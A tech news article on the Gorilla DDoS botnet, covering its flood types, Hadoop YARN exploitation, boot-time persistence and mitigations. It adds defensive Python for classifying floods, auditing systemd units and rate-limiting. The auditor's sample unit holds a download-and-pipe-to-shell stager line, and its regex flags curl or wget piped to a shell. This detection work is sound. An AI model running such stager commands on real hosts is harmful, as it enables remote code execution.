TechForge

October 18, 2024


  • Gorilla Botnet issued over 300,000 DDoS attack commands in under a month.
  • Organisations must strengthen defences with firewalls, DDoS protection services, and rate-limiting and traffic filtering.

A new botnet named Gorilla (also known as GorillaBot) is making headlines in the cybersecurity industry, and its origins trace back to the infamous Mirai botnet. For those unfamiliar, a botnet is a network of infected devices under an attacker's control, frequently used to perform DDoS (Distributed Denial-of-Service) attacks by flooding targets with traffic.

But Gorilla isn't your typical malware; it is a more sophisticated strain that borrows many techniques from Mirai's leaked source code.

Gorilla Botnet goes beyond typical DDoS botnets in the breadth of industries and countries it targets. According to NSFOCUS, the cybersecurity firm that identified the strain in September 2024, Gorilla has been extremely active: it issued over 300,000 attack commands in less than a month, averaging around 20,000 a day. The attacks were hardly small-scale. Gorilla targeted more than 100 nations, including economic powerhouses such as China, the US, Canada, and Germany, and hit important sectors including universities, government websites, telecoms, banks, and gaming platforms.

Essentially, the Gorilla botnet is a network of compromised IoT devices and computers that the attackers control remotely. Together the devices form an army capable of large-scale DDoS attacks, flooding targeted systems with so much traffic that they become unreachable. What makes Gorilla so dangerous is its wide range of attack methods, from generic UDP and SYN floods to more specialised ones such as the Valve Source Engine (VSE) flood, which bombards game servers with the query packets they are obliged to answer. Because UDP is connectionless and no handshake is required, the bots can also spoof their source IP addresses, so the flood traffic cannot be traced back to them and cannot be filtered simply by blocking the apparent senders.
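The three flood types named above leave different fingerprints in traffic, and a defender's first job is to tell them apart, because the right filter differs for each. The following is an added example, not code from the article or from NSFOCUS: it classifies a burst of packet records per destination as a spoofed-source UDP flood, a SYN flood or a VSE query flood. The packet records are constructed, the thresholds are illustrative, and the only protocol fact it relies on is the public A2S_INFO query format that Source-engine servers answer.

```python
"""Classify a burst of packet records into the flood types the article
attributes to Gorilla: a UDP flood from spoofed sources, a SYN flood and a
Valve Source Engine (VSE) query flood. Added example, not code from the
article or from NSFOCUS; the packet records below are constructed."""
from collections import Counter, defaultdict
from dataclasses import dataclass

# The A2S_INFO request that Source-engine game servers answer (public
# protocol format). A VSE flood is this query repeated at very high rate.
VSE_QUERY = b"\xff\xff\xff\xffTSource Engine Query\x00"


@dataclass(frozen=True)
class Packet:
    ts: float             # arrival time in seconds
    src: str
    dst: str
    proto: str            # "udp" or "tcp"
    flags: str = ""       # TCP flags, e.g. "S" (SYN only) or "SA"
    payload: bytes = b""


def classify(packets, window=1.0, pps_threshold=100, spoof_ratio=0.9):
    """Return {dst: verdict} for every destination whose packet rate exceeds
    pps_threshold in some window; quiet destinations are omitted."""
    by_dst = defaultdict(list)
    for p in packets:
        by_dst[p.dst].append(p)

    verdicts = {}
    for dst, pkts in by_dst.items():
        per_window = Counter(int(p.ts // window) for p in pkts)
        if max(per_window.values()) / window < pps_threshold:
            continue
        n = len(pkts)
        vse = sum(p.payload.startswith(VSE_QUERY) for p in pkts) / n
        syn_only = sum(p.proto == "tcp" and p.flags == "S" for p in pkts) / n
        udp = sum(p.proto == "udp" for p in pkts) / n
        # Nearly one packet per distinct source is the fingerprint of
        # spoofing: a real client population repeats its addresses.
        distinct_src = len({p.src for p in pkts}) / n
        if vse >= 0.5:
            verdicts[dst] = "vse-flood"
        elif syn_only >= 0.9:
            verdicts[dst] = "syn-flood"
        elif udp >= 0.9 and distinct_src >= spoof_ratio:
            verdicts[dst] = "udp-flood (spoofed sources)"
        elif udp >= 0.9:
            verdicts[dst] = "udp-flood"
        else:
            verdicts[dst] = "mixed-flood"
    return verdicts


def sample_traffic():
    """Constructed packet records covering one second of traffic."""
    pk = []
    # (a) UDP flood at 300 pps, every packet from a different (spoofed) source
    for i in range(300):
        pk.append(Packet(i / 300, f"10.{i // 256}.{i % 256}.{i % 9 + 1}",
                         "203.0.113.10", "udp", payload=b"\x00" * 64))
    # (b) SYN flood at 200 pps from five sources, handshakes never completed
    for i in range(200):
        pk.append(Packet(i / 200, f"192.0.2.{i % 5 + 1}",
                         "203.0.113.20", "tcp", flags="S"))
    # (c) VSE flood: A2S_INFO queries at 150 pps from spoofed sources
    for i in range(150):
        pk.append(Packet(i / 150, f"10.{i // 256}.{i % 256}.{i % 7 + 1}",
                         "203.0.113.30", "udp", payload=VSE_QUERY))
    # (d) a legitimate client: 20 small UDP packets over one second
    for i in range(20):
        pk.append(Packet(i / 20, "198.51.100.7",
                         "203.0.113.40", "udp", payload=b"hello"))
    return pk


if __name__ == "__main__":
    for dst, verdict in sorted(classify(sample_traffic()).items()):
        print(dst, verdict)
```

The verdict matters for what comes next: a VSE flood can be dropped by payload signature on any port that does not host a game server, a SYN flood is best answered with SYN cookies or a proxy that completes handshakes, and a spoofed UDP flood cannot be handled by per-source rules at all, which is why the mitigation section below leans on upstream scrubbing.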

But it does not end there. Gorilla also exploits a vulnerability in Apache Hadoop YARN RPC, known since 2021, to execute commands remotely on exposed Hadoop hosts and enlist them. To ensure persistence, the malware installs a service on the infected host so that it is launched automatically every time the system boots, which makes the infection harder to remove: killing the process is not enough, the service definition has to be found and disabled as well.

In addition, Gorilla Botnet has notable stealth capabilities. To hide its activity and evade detection, it uses encryption algorithms commonly associated with the Keksec group, a notorious hacking organisation. The encryption and persistence together show how sophisticated this malware is.
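Boot-time persistence through a service is the kind of thing an incident responder should check for systematically rather than by eye. The following is an added example, not code from the article or from NSFOCUS, and it does not reproduce the actual service Gorilla installs, which the article does not describe: it audits systemd unit files for the two traits such droppers usually share, an ExecStart that runs from a world-writable directory or one that downloads and pipes code into a shell. The unit files and service names in the sample are constructed.

```python
"""Audit systemd unit files for the kind of boot-time persistence the
article describes (a service that re-launches the malware at every start).
Added example, not code from the article or from NSFOCUS; the unit files
below are constructed and their service names are invented."""
import os
import re

# Directories any local user (or a dropper running as one) can write to.
WRITABLE_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/")
# "curl ... | sh" style stagers: a download tool piped into a shell.
PIPE_TO_SHELL = re.compile(r"\b(?:curl|wget)\b[^|]*\|\s*(?:/bin/)?(?:ba|da|a)?sh\b")
URL = re.compile(r"https?://")


def exec_start_lines(unit_text):
    """Yield the command part of each ExecStart= in the [Service] section,
    with systemd's optional prefix characters (-, @, +, !, :) stripped."""
    section = None
    for raw in unit_text.splitlines():
        line = raw.strip()
        if not line or line.startswith(("#", ";")):
            continue
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1]
            continue
        if section == "Service" and line.startswith("ExecStart="):
            yield line.split("=", 1)[1].strip().lstrip("-@+!:")


def audit_unit(name, unit_text):
    """Return a list of human-readable findings for one unit file."""
    findings = []
    for cmd in exec_start_lines(unit_text):
        if any(d in cmd for d in WRITABLE_DIRS):
            findings.append(f"{name}: ExecStart runs from a world-writable directory: {cmd}")
        if PIPE_TO_SHELL.search(cmd):
            findings.append(f"{name}: ExecStart downloads and pipes code into a shell: {cmd}")
        elif URL.search(cmd):
            findings.append(f"{name}: ExecStart references a remote URL: {cmd}")
    return findings


def audit_units(units):
    """units: {filename: text}. Returns {filename: findings} for units that
    produced at least one finding."""
    report = {}
    for name, text in units.items():
        findings = audit_unit(name, text)
        if findings:
            report[name] = findings
    return report


def load_units(directory="/etc/systemd/system"):
    """Read every *.service file from a directory, for use on a real host."""
    units = {}
    for fn in os.listdir(directory):
        if fn.endswith(".service"):
            with open(os.path.join(directory, fn), errors="replace") as f:
                units[fn] = f.read()
    return units


# Constructed sample: one benign unit and two invented persistence units.
SAMPLE_UNITS = {
    "sshd.service": """[Unit]
Description=OpenBSD Secure Shell server
After=network.target

[Service]
ExecStart=/usr/sbin/sshd -D $SSHD_OPTS
Restart=on-failure
""",
    "netupdate.service": """[Unit]
Description=Network Update
After=network-online.target

[Service]
Type=simple
ExecStart=/bin/sh -c 'curl -s http://203.0.113.5/update.sh | sh'
Restart=always

[Install]
WantedBy=multi-user.target
""",
    "netmon.service": """[Service]
ExecStart=-/tmp/.cache/netmon
Restart=always

[Install]
WantedBy=multi-user.target
""",
}

if __name__ == "__main__":
    for unit, findings in audit_units(SAMPLE_UNITS).items():
        for f in findings:
            print(f)
```

On a live host, `audit_units(load_units())` covers `/etc/systemd/system`; the same function can be pointed at `/usr/lib/systemd/system` and at per-user `~/.config/systemd/user` directories. A unit that passes this audit is not proven clean, since a dropper can copy its binary into a conventional path, so the findings are a triage list to pair with package-manager ownership checks, not a verdict.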

The botnet isn't entirely new. According to the security researcher Fox_threatintel, Gorilla Botnet has been operating for over a year, but its recent surge in attacks is what has drawn attention.

Mitigation strategies

To protect against threats like Gorilla Botnet, organisations should adopt proactive mitigation strategies. Attacks can be devastating, but there are several ways to strengthen defences:

  1. Deploy firewalls and intrusion detection systems (IDS): Firewalls can block suspicious traffic before it reaches an organisation's services, while an IDS can detect abnormal traffic patterns and alert teams to an attack in progress. Note that an on-premises firewall cannot help once the flood is large enough to saturate the internet link in front of it.
  2. Use cloud-based DDoS protection services: Cloud providers offer scalable DDoS protection that absorbs and scrubs high-volume attacks upstream of the organisation's own network, keeping downtime for critical systems to a minimum. This is the only practical answer to volumetric floods with spoofed sources, which cannot be filtered by sender address.
  3. Implement rate-limiting and traffic filtering: By limiting the number of requests a single source may make to a service in a given timeframe (rate-limiting), organisations reduce the effectiveness of botnets such as Gorilla. Traffic filtering can additionally drop traffic that is recognisably malicious, for example game-server query packets sent to hosts that run no game server, while legitimate users keep their access.
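Rate-limiting is usually described as a single threshold, but a useful implementation also needs a burst allowance for well-behaved clients and an escalation path so that a source which keeps hammering is blocked outright instead of being re-evaluated on every packet. The following is an added example, not code from the article or from any vendor: a per-source token bucket that escalates to a temporary block, run over a constructed request stream containing a normal client and one flooding source. The thresholds are illustrative.

```python
"""Per-source rate limiting with escalation to a temporary block, the
'rate-limiting and traffic filtering' step of the mitigation list.
Added example, not code from the article; the request stream is constructed
and the thresholds are illustrative."""
from collections import Counter, defaultdict, deque


class TokenBucket:
    """Classic token bucket: `rate` tokens per second refill, `burst` capacity."""

    def __init__(self, rate, burst):
        self.rate, self.burst = rate, burst
        self.tokens = float(burst)
        self.last = None

    def allow(self, now):
        if self.last is None:
            self.last = now
        self.tokens = min(self.burst, self.tokens + (now - self.last) * self.rate)
        self.last = now
        if self.tokens >= 1.0:
            self.tokens -= 1.0
            return True
        return False


class SourceLimiter:
    """One bucket per source address. A source denied `block_after` times
    within `window` seconds is blocked for `block_for` seconds, so a flood
    stops costing bucket bookkeeping on every packet."""

    def __init__(self, rate=10.0, burst=20, block_after=100, window=1.0, block_for=60.0):
        self.rate, self.burst = rate, burst
        self.block_after, self.window, self.block_for = block_after, window, block_for
        self.buckets = {}
        self.denials = defaultdict(deque)   # src -> timestamps of recent denials
        self.blocked_until = {}

    def check(self, src, now):
        """Return 'allow', 'drop' (over rate) or 'blocked' (temporarily banned)."""
        until = self.blocked_until.get(src)
        if until is not None:
            if now < until:
                return "blocked"
            # Block expired: forget the source's history and start fresh.
            del self.blocked_until[src]
            self.buckets.pop(src, None)
            self.denials.pop(src, None)
        bucket = self.buckets.setdefault(src, TokenBucket(self.rate, self.burst))
        if bucket.allow(now):
            return "allow"
        recent = self.denials[src]
        recent.append(now)
        while recent and recent[0] < now - self.window:
            recent.popleft()
        if len(recent) >= self.block_after:
            self.blocked_until[src] = now + self.block_for
            return "blocked"
        return "drop"


def simulate():
    """Constructed stream: a well-behaved client at 5 req/s, one source
    sending 500 req/s for two seconds, then that source trying again."""
    lim = SourceLimiter()
    result = {"legit": Counter(), "flood": Counter(), "retry": Counter()}
    for i in range(50):                       # 5 req/s for ten seconds
        result["legit"][lim.check("198.51.100.7", i * 0.2)] += 1
    for i in range(1000):                     # 500 req/s for two seconds
        result["flood"][lim.check("203.0.113.99", i / 500)] += 1
    for t in range(3, 11):                    # same source, now at 1 req/s
        result["retry"][lim.check("203.0.113.99", float(t))] += 1
    result["after_block_expires"] = lim.check("203.0.113.99", 70.0)
    return result


if __name__ == "__main__":
    for k, v in simulate().items():
        print(k, dict(v) if isinstance(v, Counter) else v)
```

Two caveats a practitioner would add. First, keying on source address only works for traffic whose source is genuine (TCP connections, or UDP from clients that must receive a reply); against the spoofed UDP floods described earlier every packet arrives from a fresh address, so the per-source tables just grow and the job has to move to payload-based filtering and upstream scrubbing. Second, the block list needs a cap and an expiry, as here, or the limiter itself becomes a memory-exhaustion target.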

By implementing these strategies, organisations can be better prepared for most DDoS attacks. As botnets like Gorilla evolve, it is critical to maintain a multilayered security strategy that combines these tools and procedures rather than relying on any one of them.

To summarise, Gorilla Botnet is a serious threat that combines Mirai's proven flood techniques with its own persistence and stealth. Its sophisticated malware infrastructure and global attack scope are a wake-up call for companies to strengthen their cybersecurity defences and remain vigilant.

About the Author

Muhammad Zulhusni

As a tech journalist, Zul focuses on topics including cloud computing, cybersecurity, and disruptive technology in the enterprise industry. He has expertise in moderating webinars and presenting content on video, in addition to having a background in networking technology.
